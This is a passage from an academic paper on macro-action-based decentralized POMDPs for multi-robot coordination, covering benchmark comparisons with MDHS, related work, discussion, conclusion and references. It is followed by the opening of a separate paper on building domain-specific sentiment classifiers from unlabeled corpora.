2017) and a DICE-based approach (Omidshafiei et al., 2017) have been explored. G-DICE (Omidshafiei et al., 2017) is the same as O-DICE except it is applied to the finite-state controller representation rather than the tree. The heuristic search method from (Amato et al., 2017) is similar to multi-agent A* approaches (Oliehoek et al., 2013; Szer, Charpillet, & Zilberstein, 2005; Oliehoek, Spaan, & Vlassis, 2008; Oliehoek, Whiteson, & Spaan, 2009), but again is applied to the finite-state controller representation rather than the tree. It is worth noting that the key difference is the policy representation and the algorithms in this paper could be applied to finite-state controllers and many finite-state controller- based methods could be applied to trees. This paper introduces macro-actions in Dec- POMDPs and explores some initial algorithms for tree-based solutions; many future algo- rithms are now possible. Nevertheless, for thoroughness of results, we provide the performance of the heuristic search method MDHS (Amato et al., 2017) on our benchmark problems. MDHS is an anytime algorithm, so it will continue to improve until the best parameters for the given controller size are found. For a fair comparison, we let it run for the same amount of time as the full version of O-DICE. We set the parameters in the same way as the previous work (Amato et al., 2017) (e.g., 5 controller nodes were used) and the initial lower bound was found from the best of 100 random controller parameterizations. Reporting results for all horizons of all domains becomes redundant, but the results we provide are representative of the other domains and horizon values. As can be seen in Table 4, MDHS often achieves values that are similar to the O- DICE values, but sometimes significantly underperforms the other method. For instance, MDHS can only achieve 17% of the O-DICE value in the meeting in a grid problem with 4 847 Amato, Konidaris, Kaelbling & How Meeting in a Grid 2 agents, hor=100 2 agents, hor=200 4 agents, hor=20 value time (s) value % O-DICE value % O-DICE 92.478 98% 192.407 99% 0.076 17% NAMO size 10 size 15 size 20 value % O-DICE value % O-DICE value % O-DICE Horizon 10 −10 100% −10 100% −10 100% Horizon 20 −18.533 88% −20 100% −20 100% Horizon 30 −19.558 89% −27.458 94% −29.961 99% Robot warehouse No Communication Communication Signaling value % O-DICE value % O-DICE value % O-DICE Horizon 7 0 100% 0.205 94% 0.207 94% Horizon 8 0 100% 0.393 94% 0.428 99% Horizon 9 1.120 97% 1.138 69% 1.611 95% Horizon 10 2.064 94% 1.167 42% 1.055 38% Horizon 11 2.932 94% − − 3.807 96% Table 4: Results for the controller-based MDHS method on our benchmark problems along with the performance relative of O-DICE (full). agents, 38% of the O-DICE value is produced in the horizon 10 robot warehouse problem with signaling and 69% and 42% of the O-DICE value is produced in the horizon 9 and 10 warehouse problems with communication. The values for the NAMO problems are not particularly interesting as all policies have the same value until the horizon becomes significantly longer than the domain size (since the agent requires more steps to reach the goal as the domain size increase), but we still see that MDHS does not achieve the full O-DICE values for non-degenerate horizons. In general, MDHS is more scalable in terms of the horizon (e.g., solving the horizon 11 robot warehouse problem with communication), but scalability depends on choosing a proper controller size to balance solution quality and computational efficiency. As a result, controller-based methods, such as MDHS, can return lower quality solutions on horizons that are solvable by the tree-based methods. MDHS will also require an intractable amount of time to improve solutions as the number of observations grows since it searches for assign- ments for all possible next observations in the controller (Omidshafiei et al., 2017). As is currently the case in (primitive) Dec-POMDPs, tree-based and controller-based algorithms both have their place in macro-action-based Dec-POMDPs. The performance of MDHS (or controller-based methods more generally) relative to tree-based methods is very problem 848 Modeling and Planning with Macro-Actions in Decentralized POMDPs and horizon dependent (as seen in our results). A general rule of thumb may be to use a tree-based method for finite-horizon problems that are solvable and to use controller-based (or other methods) otherwise. 7. Related Work While many hierarchical approaches have been developed for multi-agent systems (Hor- ling & Lesser, 2004), very few are applicable to multi-agent models based on MDPs and POMDPs. Perhaps the most similar approach is that of Ghavamzadeh et al. (Ghavamzadeh, Mahadevan, & Makar, 2006). This is a multi-agent reinforcement learning approach with a given task hierarchy where communication is used to coordinate actions at higher levels and agents are assumed to be independent at lower levels. This work was limited to a multi- agent MDP model with (potentially costly) communication, making the learning problem challenging, but the planning problem is simpler than the full Dec-POMDP case. Other approaches have considered identifying and exploiting independence between agents to limit reasoning about coordination and improve scalability. Approaches in- clude general assumptions about agent independence like transition independent Dec-MDPs (Becker, Zilberstein, Lesser, & Goldman, 2004b) and factored models such as ND-POMDPs (Nair et al., 2005) as well as methods that consider coordination based on ‘events’ or states. Events which may require or allow interaction have been explored in Dec-MDPs (Becker, Lesser, & Zilberstein, 2004a) and (centralized) multi-robot systems (Messias, Spaan, & Lima, 2013). Other methods have considered locations or states where interaction is needed to improve scalability in planning (Spaan & Melo, 2008; Velagapudi et al., 2011) and learn- ing (Melo & Veloso, 2011). The work on independence assumes agents are always independent or coordinate using a fixed factorization, making it less general than an option-based approach. The work on event and state-based coordination focuses on a different type of domain knowledge: knowledge of states where coordination takes place. While this type of knowledge may be available, it may be easier to obtain and utilize procedural knowledge. The domain may therefore be easier to specify using macro-actions with different properties (such as independence or tight coordination), allowing planning to determine the necessary states for coordination. Furthermore, this type of state information could be used to define options for reaching these coordination points. Lastly, macro-actions could possibly be used in conjunction with previous methods, further improving scalability. As mentioned in the introduction, we do not target scalability with respect to the number of agents. Several such methods have been developed that make various assumptions about agent abilities and policies (e.g., Sonu, Chen, & Doshi, 2015; Varakantham, Adulyasak, & Jaillet, 2014; Velagapudi et al., 2011; Oliehoek et al., 2013; Nguyen, Kumar, & Lau, 2017a, 2017b). Macro-action-based methods could potentially be incorporated into these methods to again increase scalability in terms of both the number of agent as well as the horizon and other problem variables. There are several frameworks for multi-robot decision making in complex domains. For instance, behavioral methods have been studied for performing task allocation over time with loosely-coupled (Parker, 1998) or tightly-coupled (Stroupe, Ravichandran, & Balch, 849 Amato, Konidaris, Kaelbling & How 2004) tasks. These are heuristic in nature and make strong assumptions about the type of tasks that will be completed. Linear temporal logic (LTL) has also been used to specify robot behavior (Belta, Bic- chi, Egerstedt, Frazzoli, Klavins, & Pappas, 2007; Loizou & Kyriakopoulos, 2004); from this specification, reactive controllers that are guaranteed to satisfy the specification can be derived. These methods are appropriate when the world dynamics can be effectively described non-probabilistically and when there is a useful characterization of the robot’s desired behavior in terms of a set of discrete constraints. When applied to multiple robots, it is necessary to give each robot its own behavior specification. In contrast, our approach (probabilistically) models the domain and allows the planner to automatically optimize the robots’ behavior. Market-based approaches use traded value to establish an optimization framework for task allocation (Dias & Stentz, 2003; Gerkey & Matarić, 2004). These approaches have been used to solve real multi-robot problems (Kalra, Ferguson, & Stentz, 2005), but are largely aimed to tasks where the robots can communicate through a bidding mechanism. Emery-Montemerlo et al. (Emery-Montemerlo, Gordon, Schneider, & Thrun, 2005) in- troduced a (cooperative) game-theoretic formalization of multi-robot systems which resulted in solving a Dec-POMDP. An approximate forward search algorithm was used to generate solutions, but because a (relatively) low-level Dec-POMDP was used scalability was limited. Their system also required synchronized execution by the robots. 8. Discussion We have considered local options in this paper, but our framework could support other types of options. For example, we could consider options in which the policy is local but the initiation and termination sets are not—for example, initiation and termination could depend on the agent’s history, or other agent’s states. Generalizing a local option in this way retains the advantages described here, because the decision about which option to execute already requires coordination but executing the option itself does not. We could also use options with history-based policies, or define multi-agent options that control a subset of agents to complete a task. In general, we expect that an option will be useful for planning when its execution allows us to temporarily ignore some aspect of the original problem. For example, the option might be defined in a smaller state space (allowing us to ignore the full complexity of the problem), or use only observable information (allowing us to ignore the partially observable aspect of the problem), or involve a single agent or a subset of agents communicating (allowing us to ignore the decentralized aspect of the problem). We can gain additional benefits by exploiting known structure in the multi-agent prob- lem. For instance, most controllers only depend on locally observable information and do not require coordination. For example, consider a controller that navigates to a waypoint. Only local information is required for navigation—the robot may detect other robots but their presence does not change its objective, and it simply moves around them—but choos- ing the target waypoint likely requires the planner to consider the locations and actions of all robots. Macro-actions with independent execution allow coordination decisions to be made only when necessary (i.e., when choosing macro-actions) rather than at every time step. Because MacDec-POMDPs are built on top of Dec-POMDPs, macro-action choice 850 Modeling and Planning with Macro-Actions in Decentralized POMDPs may depend on history, but during execution macro-actions may depend only on a single observation or on any number of steps of history, or even represent the actions of a set of robots. That is, macro-actions are very general and can be defined in such a way to take advantage of the knowledge available to the robots during execution. We have so far assumed that the agent is given an appropriate set of macro-actions with which to plan. In all of our domains, there were quite natural choices for macro-actions and macro-observations (e.g., navigating to depots and observing that you are in a depot along with its contents), but such natural representations are not always present. Research on skill discovery (McGovern & Barto, 2001) has attempted to devise methods by which a single agent can instead acquire an appropriate set of options autonomously, through interaction with its (fully observable) environment. While some of these methods may be directly applicable, the characteristics of the partially observable, multi-agent case also offer new opportunities for skill discovery. For example, we may wish to synthesize skills that collapse uncertainty across multiple agents, perform coordinated multi-agent actions, communicate essential state information, or allow agents to synchronize and replan. Related work has begun to explore some of these topics (Omidshafiei et al., 2017, 2017a), but many open questions remain. In terms of multi-robot domains, we demonstrated macro-action-based approaches on multiple other domains with limited sensing and communication. These other domains included a logistics (beer delivery) domain, where two robots must efficiently find out about and service beer orders in cooperation with a ‘picker/bartender’ robot, which can retrieve items (Amato, Konidaris, Anders, Cruz, How, & Kaelbling, 2015; Amato et al., 2017), a package delivery domain, where a group of aerial robots must retrieve and deliver packages from base locations to delivery locations while dealing with limited battery life (Omidshafiei, Agha-mohammadi, Amato, & How, 2015; Omidshafiei, Agha-mohammadi, Amato, Liu, How, & Vian, 2016; Omidshafiei et al., 2017a, 2017) as well as an adversarial domain in which a team of robots is playing capture the flag against another team of robots (Hoang, Xiao, Sivakumar, Amato, & How, 2018). Also, our results have shown that the use of macro-actions can significantly improve scalability—for example, by allowing us to use larger grids with the same set of agents and obstacles in the NAMO problem (see Figure 8). However, in such cases—where the state space grows but the number of agents and significant interactions does not—we should in principle be able to deal with any size grid with no increase in computation time, because the size of the grid is irrelevant to the coordination aspects of the problem. This does not occur in the work presented here because we plan in the original state space; methods for constructing a more abstract task-level representation (Konidaris, Kaelbling, & Lozano- Perez, 2018) could provide further performance improvements. It is also worth noting that our approach can incorporate state-of-the-art methods for solving more restricted scenarios as options. The widespread use of techniques for solving restricted robotics scenarios has led to a plethora of usable algorithms for specific problems, but no way to combine these in more complex scenarios. Our approach can build on the large amount of research in single and multi-robot systems that has gone into solving difficult problems such as navigation in a formation (Balch & Arkin, 1998), cooperative transport of an object (Kube & Bonabeau, 2000), coordination with signaling (Beckers, Holland, & Deneubourg, 1994) or communication under various limitations (Rekleitis, Lee-Shue, New, 851 Amato, Konidaris, Kaelbling & How & Choset, 2004). The solutions to these problems could be represented as macro-actions in our framework, building on existing research to solve even more complex multi-robot problems. This paper focused on (sample-based) planning using macro-actions, but learning could also be used to generate policies over macro-actions. In particular, other work developed a method that learns policies using only high-level macro-action trajectories (macro-actions and macro-observations) (Liu, Amato, Anesta, Griffith, & How, 2016). As a result, the methods don’t need any models and are applicable in cases where data is difficult or costly to obtain (e.g., human demonstrations, elaborate training exercises). Our experiments showed that the methods can also produce very high-quality solutions, even outperforming and improving upon hand-coded ‘expert’ solutions with a small amount of data. We also improved upon and tested these approaches in a multi-robot search and rescue problem (Liu, Sivakumar, Omidshafiei, Amato, & How, 2017). In general, using macro-actions with other multi-agent reinforcement learning methods (including the popular deep methods e.g., Foerster, Assael, de Freitas, & Whiteson, 2016; Omidshafiei, Pazis, Amato, How, & Vian, 2017b; Lowe, Wu, Tamar, Harb, Abbeel, & Mordatch, 2017; Rashid, Samvelyan, Schroeder, Farquhar, Foerster, & Whiteson, 2018; Palmer, Tuyls, Bloembergen, & Savani, 2018; Omidshafiei, Kim, Liu, Tesauro, Riemer, Amato, Campbell, & How, 2019) could be a promising way of improving performance, while allowing asynchronous action execution. Finally, while this paper focused on dynamic programming (Hansen et al., 2004; Seuken & Zilberstein, 2007b) and direct policy search methods (Oliehoek et al., 2008), forward search methods (Oliehoek et al., 2013; Szer et al., 2005; Oliehoek et al., 2008, 2009; Diban- goye et al., 2016) are likely to perform well when using MacDec-POMDPs. When building up policies from the last step, as in dynamic programming, adding macro-actions to the beginning of a tree changes when the macro-actions deeper down the tree will be completed. In forward search methods, actions are added to the leaves of the tree, leaving the com- pletion times for previous macro-actions in the policy (those at earlier heights) the same. We have not explored such search methods for MacDec-POMDPs, but they appear to be promising. 9. Conclusion We presented a new formulation for representing decentralized decision-making problems under uncertainty using higher-level macro-actions (modeled as options), rather than primi- tive (single-step) actions. We called this framework the macro-action Dec-POMDP (MacDec- POMDP). Because our macro-action model is built on top of the Dec-POMDP framework, Dec-POMDP algorithms can be extended to solve problems with macro-actions while re- taining agent coordination. We focused on local options, which allow us to reason about coordination only when deciding which option to execute. Our results have demonstrated that high-quality results can be achieved on current benchmarks, and that very large prob- lems can be effectively modeled and solved this way. As such, our macro-action framework represents a promising approach for scaling multi-agent planning under uncertainty to real- world problem sizes. We also have demonstrated that complex multi-robot domains can be solved with Dec- POMDP-based methods. The MacDec-POMDP model is expressive enough to capture 852 Modeling and Planning with Macro-Actions in Decentralized POMDPs multi-robot systems of interest, but also simple enough to be feasible to solve in practice. Our results show that a general purpose MacDec-POMDP planner can generate cooperative behavior for complex multi-robot domains with task allocation, direct communication, and signaling behavior emerging automatically as properties of the solution for the given problem model. Because all cooperative multi-robot problems can be modeled as Dec-POMDPs, MacDec-POMDPs represent a powerful tool for automatically trading-off various costs, such as time, resource usage and communication while considering uncertainty in the dynamics, sensors and other robot information. These approaches have great potential to lead to automated solution methods for general probabilistic multi-robot coordination problems with heterogeneous robots in complex, uncertain domains. More generally, this work opens the door to many research questions about representing and solving multi-agent problems hierarchically. Promising avenues for future work include exploring different types of options, further work on reinforcement learning for either gen- erating options or policies over options, and developing more scalable solution methods that exploit domain and hierarchical structure. One example of such structure would be the use of a factored reward function (Nair et al., 2005) which allows more efficient policy generation and evaluation. Acknowledgements We would like to thank Matthijs Spaan and Feng Wu for providing results as well as Ari An- ders, Gabriel Cruz, and Christopher Maynor for their help with the robot experiments. Re- search supported in part by NSF project #1664923, ONR MURI project #N000141110688, DARPA YFA D15AP00104, AFOSR YIP FA9550-17-1-0124, and NIH R01MH109177. References Amato, C., Bernstein, D. S., & Zilberstein, S. (2010a). Optimizing fixed-size stochastic controllers for POMDPs and decentralized POMDPs. Journal of Autonomous Agents and Multi-Agent Systems, 21 (3), 293–320. Amato, C., Bonet, B., & Zilberstein, S. (2010b). Finite-state controllers based on Mealy machines for centralized and decentralized POMDPs. In Proceedings of the AAAI Conference on Artificial Intelligence, pp. 1052–1058. Amato, C., Chowdhary, G., Geramifard, A., Ure, N. K., & Kochenderfer, M. J. (2013). Decentralized control of partially observable Markov decision processes. In Proceedings of the IEEE Conference on Decision and Control, pp. 2398–2405. Amato, C., Dibangoye, J. S., & Zilberstein, S. (2009). Incremental policy generation for finite-horizon DEC-POMDPs. In Proceedings of the International Conference on Au- tomated Planning and Scheduling, pp. 2–9. Amato, C., Konidaris, G. D., Anders, A., Cruz, G., How, J. P., & Kaelbling, L. P. (2015). Policy search for multi-robot coordination under uncertainty. In Proceedings of the Robotics: Science and Systems Conference. 853 Amato, Konidaris, Kaelbling & How Amato, C., Konidaris, G. D., Anders, A., Cruz, G., How, J. P., & Kaelbling, L. P. (2017). Policy search for multi-robot coordination under uncertainty. The International Jour- nal of Robotics Research. Aras, R., Dutech, A., & Charpillet, F. (2007). Mixed integer linear programming for exact finite-horizon planning in decentralized POMDPs. In Proceedings of the International Conference on Automated Planning and Scheduling, pp. 18–25. Balch, T., & Arkin, R. C. (1998). Behavior-based formation control for multi-robot teams. IEEE Transactions on Robotics and Automation, 14 (6), 926–939. Barto, A., & Mahadevan, S. (2003). Recent advances in hierarchical reinforcement learning. Discrete Event Dynamic Systems, 13, 41–77. Becker, R., Lesser, V., & Zilberstein, S. (2004a). Decentralized Markov Decision Processes with Event-Driven Interactions. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems, pp. 302–309. Becker, R., Zilberstein, S., Lesser, V., & Goldman, C. V. (2004b). Solving transition- independent decentralized Markov decision processes. Journal of Artificial Intelligence Research, 22, 423–455. Beckers, R., Holland, O., & Deneubourg, J.-L. (1994). From local actions to global tasks: Stigmergy and collective robotics. In Artificial life IV, Vol. 181, p. 189. Belta, C., Bicchi, A., Egerstedt, M., Frazzoli, E., Klavins, E., & Pappas, G. J. (2007). Symbolic planning and control of robot motion [grand challenges of robotics]. Robotics & Automation Magazine, IEEE, 14 (1), 61–70. Bernstein, D. S., Amato, C., Hansen, E. A., & Zilberstein, S. (2009). Policy iteration for decentralized control of Markov decision processes. Journal of Artificial Intelligence Research, 34, 89–132. Bernstein, D. S., Givan, R., Immerman, N., & Zilberstein, S. (2002). The complexity of decentralized control of Markov decision processes. Mathematics of Operations Research, 27 (4), 819–840. Bohren, J. (2010). SMACH. http://wiki.ros.org/smach/. Boularias, A., & Chaib-draa, B. (2008). Exact dynamic programming for decentralized POMDPs with lossless policy compression. In Proceedings of the International Con- ference on Automated Planning and Scheduling. Dias, M. B., & Stentz, A. T. (2003). A comparative study between centralized, market- based, and behavioral multirobot coordination approaches. In Proceedings of IEEE/RSJ International Conference on Intelligent Robots and Systems, Vol. 3, pp. 2279 – 2284. Dibangoye, J. S., Amato, C., Buffet, O., & Charpillet, F. (2013). Optimally solving Dec- POMDPs as continuous-state MDPs. In Proceedings of the International Joint Con- ference on Artificial Intelligence. Dibangoye, J. S., Amato, C., Buffet, O., & Charpillet, F. (2016). Optimally solving Dec- POMDPs as continuous-state MDPs. Journal of Artificial Intelligence Research, 55, 443–497. 854 Modeling and Planning with Macro-Actions in Decentralized POMDPs Dibangoye, J. S., Amato, C., Doniec, A., & Charpillet, F. (2013). Producing efficient error- bounded solutions for transition independent decentralized MDPs. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems. Dietterich, T. G. (2000). Hierarchical reinforcement learning with the MAXQ value function decomposition. Journal of Artificial Intelligence Research, 13, 227–303. Emery-Montemerlo, R., Gordon, G., Schneider, J., & Thrun, S. (2005). Game theoretic control for robot teams. In Proceedings of the International Conference on Robotics and Automation, pp. 1163–1169. Foerster, J., Assael, I. A., de Freitas, N., & Whiteson, S. (2016). Learning to communicate with deep multi-agent reinforcement learning. In Advances in Neural Information Processing Systems, pp. 2137–2145. Gerkey, B. P., & Matarić, M. J. (2004). A formal analysis and taxonomy of task allocation in multi-robot systems. International Journal of Robotics Research, 23 (9), 939–954. Ghavamzadeh, M., Mahadevan, S., & Makar, R. (2006). Hierarchical multi-agent rein- forcement learning. Journal of Autonomous Agents and Multi-Agent Systems, 13 (2), 197–229. Hansen, E. A., Bernstein, D. S., & Zilberstein, S. (2004). Dynamic programming for partially observable stochastic games. In Proceedings of the National Conference on Artificial Intelligence, pp. 709–715. He, R., Brunskill, E., & Roy, N. (2011). Efficient planning under uncertainty with macro- actions. Journal of Artificial Intelligence Research, 523–570. Hoang, T. N., Xiao, Y., Sivakumar, K., Amato, C., & How, J. (2018). Near-optimal ad- versarial policy switching for decentralized asynchronous multi-agent systems. In Proceedings of the International Conference on Robotics and Automation. Horling, B., & Lesser, V. (2004). A survey of multi-agent organizational paradigms. The Knowledge Engineering Review, 19 (4), 281–316. Kaelbling, L. P., Littman, M. L., & Cassandra, A. R. (1998). Planning and acting in partially observable stochastic domains. Artificial Intelligence, 101, 1–45. Kalra, N., Ferguson, D., & Stentz, A. T. (2005). Hoplites: A market-based framework for planned tight coordination in multirobot teams. In Proceedings of the International Conference on Robotics and Automation, pp. 1170 – 1177. Konidaris, G., & Barto, A. G. (2007). Building portable options: Skill transfer in rein- forcement learning. Proceedings of the International Joint Conference on Artificial Intelligence, 7, 895–900. Konidaris, G., Kaelbling, L. P., & Lozano-Perez, T. (2018). From skills to symbols: Learn- ing symbolic representations for abstract high-level planning. Journal of Artificial Intelligence Research, 61, 215–289. Konidaris, G. D., & Barto, A. G. (2009). Skill discovery in continuous reinforcement learning domains using skill chaining. In Advances in Neural Information Processing Systems 22, pp. 1015–1023. 855 Amato, Konidaris, Kaelbling & How Kube, C. R., & Bonabeau, E. (2000). Cooperative transport by ants and robots. Robotics and Autonomous Systems, 30 (1-2), 85–101. Kumar, A., Mostafa, H., & Zilberstein, S. (2016). Dual formulations for optimizing dec- pomdp controllers. In Proceedings of the International Conference on Automated Planning and Scheduling. Kumar, A., & Zilberstein, S. (2010). Point-based backup for decentralized POMDPs: com- plexity and new algorithms. In Proceedings of the International Conference on Au- tonomous Agents and Multiagent Systems, pp. 1315–1322. Kumar, A., Zilberstein, S., & Toussaint, M. (2015). Probabilistic inference techniques for scalable multiagent decision making. Journal of Artificial Intelligence Research, 53 (1), 223–270. Lim, Z., Sun, L., & Hsu, D. J. (2011). Monte Carlo value iteration with macro-actions. In Advances in Neural Information Processing Systems, pp. 1287–1295. Liu, M., Amato, C., Anesta, E., Griffith, J. D., & How, J. P. (2016). Learning for decen- tralized control of multiagent systems in large partially observable stochastic environ- ments. In Proceedings of the AAAI Conference on Artificial Intelligence. Liu, M., Amato, C., Liao, X., Carin, L., & How, J. P. (2015). Stick-breaking policy learning in Dec-POMDPs. In Proceedings of the International Joint Conference on Artificial Intelligence. Liu, M., Sivakumar, K., Omidshafiei, S., Amato, C., & How, J. P. (2017). Learning for multi-robot cooperation in partially observable stochastic environments with macro- actions. In Proceedings of IEEE/RSJ International Conference on Intelligent Robots and Systems, pp. 1853–1860. Loizou, S. G., & Kyriakopoulos, K. J. (2004). Automatic synthesis of multi-agent motion tasks based on ltl specifications. In Decision and Control, 2004. CDC. 43rd IEEE Conference on, Vol. 1, pp. 153–158. IEEE. Lowe, R., Wu, Y., Tamar, A., Harb, J., Abbeel, O. P., & Mordatch, I. (2017). Multi-agent actor-critic for mixed cooperative-competitive environments. In Advances in Neural Information Processing Systems, pp. 6379–6390. McGovern, A., & Barto, A. G. (2001). Automatic discovery of subgoals in reinforcement learning using diverse density. In Proceedings of the Eighteenth International Confer- ence on Machine Learning, pp. 361–368. Melo, F., & Veloso, M. (2011). Decentralized MDPs with sparse interactions. Artificial Intelligence. Messias, J. V., Spaan, M. T. J., & Lima, P. U. (2013). GSMDPs for multi-robot sequential decision-making. In Proceedings of the Twenty-Seventh AAAI Conference on Artificial Intelligence, pp. 1408–1414. Nair, R., Varakantham, P., Tambe, M., & Yokoo, M. (2005). Networked distributed POMDPs: a synthesis of distributed constraint optimization and POMDPs. In Pro- ceedings of the National Conference on Artificial Intelligence. 856 Modeling and Planning with Macro-Actions in Decentralized POMDPs Nguyen, D. T., Kumar, A., & Lau, H. C. (2017a). Collective multiagent sequential deci- sion making under uncertainty. In Proceedings of the AAAI Conference on Artificial Intelligence. Nguyen, D. T., Kumar, A., & Lau, H. C. (2017b). Policy gradient with value function approximation for collective multiagent planning. In Advances in Neural Information Processing Systems, pp. 4322–4332. Oliehoek, F. A. (2012). Decentralized POMDPs. In Wiering, M., & van Otterlo, M. (Eds.), Reinforcement Learning: State of the Art, Vol. 12 of Adaptation, Learning, and Opti- mization, pp. 471–503. Springer Berlin Heidelberg. Oliehoek, F. A., & Amato, C. (2016). A Concise Introduction to Decentralized POMDPs. Springer. Oliehoek, F. A., Kooi, J. F., & Vlassis, N. (2008). The cross-entropy method for policy search in decentralized POMDPs. Informatica, 32, 341–357. Oliehoek, F. A., Spaan, M. T. J., Amato, C., & Whiteson, S. (2013). Incremental clustering and expansion for faster optimal planning in Dec-POMDPs. Journal of Artificial Intelligence Research, 46, 449–509. Oliehoek, F. A., Spaan, M. T. J., & Vlassis, N. (2008). Optimal and approximate Q-value functions for decentralized POMDPs. Journal of Artificial Intelligence Research, 32, 289–353. Oliehoek, F. A., Whiteson, S., & Spaan, M. T. J. (2009). Lossless clustering of histories in decentralized POMDPs. In Proceedings of the International Conference on Au- tonomous Agents and Multiagent Systems. Oliehoek, F. A., Whiteson, S., & Spaan, M. T. J. (2013). Approximate solutions for factored Dec-POMDPs with many agents. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems. Omidshafiei, S., Agha-mohammadi, A., Amato, C., & How, J. P. (2015). Decentralized control of partially observable Markov decision processes using belief space macro- actions. In Proceedings of the International Conference on Robotics and Automation, pp. 5962–5969. Omidshafiei, S., Agha-mohammadi, A., Amato, C., & How, J. P. (2017). Decentralized control of multi-robot partially observable Markov decision processes using belief space macro-actions. The International Journal of Robotics Research. Omidshafiei, S., Agha-mohammadi, A., Amato, C., Liu, S.-Y., How, J. P., & Vian, J. (2016). Graph-based cross entropy method for solving multi-robot decentralized POMDPs. In Proceedings of the International Conference on Robotics and Automation. Omidshafiei, S., Kim, D.-K., Liu, M., Tesauro, G., Riemer, M., Amato, C., Campbell, M., & How, J. (2019). Learning to teach in cooperative multiagent reinforcement learning. In Proceedings of the AAAI Conference on Artificial Intelligence. Omidshafiei, S., Liu, S.-Y., Everett, M., Lopez, B., Amato, C., Liu, M., How, J. P., & Vian., J. (2017a). Semantic-level decentralized multi-robot decision-making using 857 Amato, Konidaris, Kaelbling & How probabilistic macro-observations. In Proceedings of the International Conference on Robotics and Automation. Omidshafiei, S., Pazis, J., Amato, C., How, J. P., & Vian, J. (2017b). Deep decentralized multi-task multi-agent reinforcement learning under partial observability. In Proceed- ings of the International Conference on Machine Learning. Pajarinen, J. K., & Peltonen, J. (2011). Periodic finite state controllers for efficient POMDP and DEC-POMDP planning. In Shawe-Taylor, J., Zemel, R., Bartlett, P., Pereira, F., & Weinberger, K. (Eds.), Advances in Neural Information Processing Systems 24, pp. 2636–2644. Palmer, G., Tuyls, K., Bloembergen, D., & Savani, R. (2018). Lenient multi-agent deep reinforcement learning. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems, pp. 443–451. Parker, L. E. (1998). ALLIANCE: An architecture for fault tolerant multirobot cooperation. IEEE Transactions on Robotics and Automation, 14 (2), 220–240. Puterman, M. L. (1994). Markov Decision Processes: Discrete Stochastic Dynamic Pro- gramming. Wiley-Interscience. Quigley, M., Conley, K., Gerkey, B. P., Faust, J., Foote, T., Leibs, J., Wheeler, R., & Ng, A. Y. (2009). ROS: an open-source robot operating system. In ICRA Workshop on Open Source Software. Rashid, T., Samvelyan, M., Schroeder, C., Farquhar, G., Foerster, J., & Whiteson, S. (2018). QMIX: Monotonic value function factorisation for deep multi-agent reinforcement learning. In Proceedings of the International Conference on Machine Learning, pp. 4295–4304. Rekleitis, I., Lee-Shue, V., New, A. P., & Choset, H. (2004). Limited communication, multi- robot team based coverage. In Robotics and Automation, 2004. Proceedings. ICRA’04. 2004 IEEE International Conference on, Vol. 4, pp. 3462–3468. IEEE. Seuken, S., & Zilberstein, S. (2007a). Improved memory-bounded dynamic programming for decentralized POMDPs. In Proceedings of the Conference on Uncertainty in Artificial Intelligence, pp. 344–351. Seuken, S., & Zilberstein, S. (2007b). Memory-bounded dynamic programming for DEC- POMDPs. In Proceedings of the International Joint Conference on Artificial Intelli- gence, pp. 2009–2015. Silver, D., & Ciosek, K. (2012). Compositional planning using optimal option models. In Proceedings of the International Conference on Machine Learning. Sonu, E., Chen, Y., & Doshi, P. (2015). Individual planning in agent populations: Ex- ploiting anonymity and frame-action hypergraphs. In Proceedings of the International Conference on Automated Planning and Scheduling. Spaan, M. T. J., & Melo, F. S. (2008). Interaction-driven Markov games for decentralized multiagent planning under uncertainty. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems, pp. 525–532. 858 Modeling and Planning with Macro-Actions in Decentralized POMDPs Stilman, M., & Kuffner, J. (2005). Navigation among movable obstacles: Real-time reasoning in complex environments. International Journal on Humanoid Robotics, 2 (4), 479– 504. Stone, P., Sutton, R. S., & Kuhlmann, G. (2005). Reinforcement learning for robocup soccer keepaway. Adaptive Behavior, 13 (3), 165–188. Stroupe, A. W., Ravichandran, R., & Balch, T. (2004). Value-based action selection for exploration and dynamic target observation with robot teams. In Proceedings of the International Conference on Robotics and Automation, Vol. 4, pp. 4190–4197. IEEE. Sutton, R. S., Precup, D., & Singh, S. (1999). Between MDPs and semi-MDPs: A framework for temporal abstraction in reinforcement learning. Artificial Intelligence, 112 (1), 181– 211. Szer, D., Charpillet, F., & Zilberstein, S. (2005). MAA*: A heuristic search algorithm for solving decentralized POMDPs. In Proceedings of the Conference on Uncertainty in Artificial Intelligence. Theocharous, G., & Kaelbling, L. P. (2003). Approximate planning in POMDPs with macro-actions. In Advances in Neural Information Processing Systems. Thrun, S., Burgard, W., & Fox, D. (2005). Probabilistic Robotics (Intelligent Robotics and Autonomous Agents). The MIT Press. Varakantham, P., Adulyasak, Y., & Jaillet, P. (2014). Decentralized stochastic planning with anonymity in interactions. In Proceedings of the AAAI Conference on Artificial Intelligence, pp. 2505–2512. Velagapudi, P., Varakantham, P. R., Sycara, K., & Scerri, P. (2011). Distributed model shaping for scaling to decentralized POMDPs with hundreds of agents. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems, pp. 955–962. Wu, F., Zilberstein, S., & Chen, X. (2010a). Point-based policy generation for decentralized POMDPs. In Proceedings of the International Conference on Autonomous Agents and Multiagent Systems, pp. 1307–1314. Wu, F., Zilberstein, S., & Chen, X. (2010b). Rollout sampling policy iteration for de- centralized POMDPs. In Proceedings of the Conference on Uncertainty in Artificial Intelligence, pp. 666–673. Wu, F., Zilberstein, S., & Jennings, N. R. (2013). Monte-carlo expectation maximization for decentralized POMDPs. In Proceedings of the International Joint Conference on Artificial Intelligence, pp. 397–403. AAAI Press. 859 work_7z3ossdi4rddjfj5xuw5l6m5eq ---- Bootstrap Domain-Specific Sentiment Classifiers from Unlabeled Corpora Andrius Mudinas, Dell Zhang, and Mark Levene Department of Computer Science and Information Systems Birkbeck, University of London London WC1E 7HX, UK andrius@dcs.bbk.ac.uk, dell.z@ieee.org, mark@dcs.bbk.ac.uk Abstract There is often the need to perform sentiment classification in a particular domain where no labeled document is available. Although we could make use of a general-purpose off-the- shelf sentiment classifier or a pre-built one for a different domain, the effectiveness would be inferior. In this paper, we explore the possibil- ity of building domain-specific sentiment clas- sifiers w ith u nlabeled d ocuments o nly. Our investigation indicates that in the word em- beddings learned from the unlabeled corpus of a given domain, the distributed word rep- resentations (vectors) for opposite sentiments form distinct clusters, though those clusters are not transferable across domains. Ex- ploiting such a clustering structure, we are able to utilize machine learning algorithms to induce a quality domain-specific 